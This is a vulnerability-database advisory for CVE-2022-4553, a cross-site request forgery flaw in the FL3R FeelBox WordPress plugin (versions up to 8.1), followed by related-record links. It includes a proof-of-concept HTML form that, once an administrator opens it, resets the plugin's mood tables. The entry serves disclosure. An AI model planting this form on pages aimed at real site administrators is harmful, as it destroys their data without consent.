Lucene search
WpvulndbWPEX-ID:483ED482-A1D1-44F6-8B99-56E653D3E45FHistoryJan 04, 2023 - 12:00 a.m.
FL3R FeelBox <= 8.1 - Moods Reset via CSRF
2023-01-0400:00:00
wpvulndb
149
fl3r feelbox
cross-site request forgery
moods reset
exploit
html form
EPSS
0.001
Percentile
33.8%
The plugin does not have CSRF check when updating reseting moods which could allow attackers to make logged in admins perform such action via a CSRF attack and delete the lydl_posts & lydl_poststimestamp DB tables
Make a logged in admin open a page containing the HTML code below
<form action="https://example.com/wp-admin/options-general.php?page=feelbox" method="POST">
<input type="text" name="feelbox_submit_hidden" value="Y">
<input type="text" name="cleardata" value="DELETE">
<input type="submit" name="submit" value="submit">
</form>Related
wpvulndb
wpvulndb
FL3R FeelBox <= 8.1 - Moods Reset via CSRF
2023-01-04 00:00:00
prion
prion
Cross site request forgery (csrf)
2023-01-30 21:15:00
cve
cve
CVE-2022-4553
2023-01-30 21:15:11
nvd
nvd
CVE-2022-4553
2023-01-30 21:15:11
cvelist
cvelist
CVE-2022-4553 FL3R FeelBox <= 8.1 - Moods Reset via CSRF
2023-01-30 20:31:44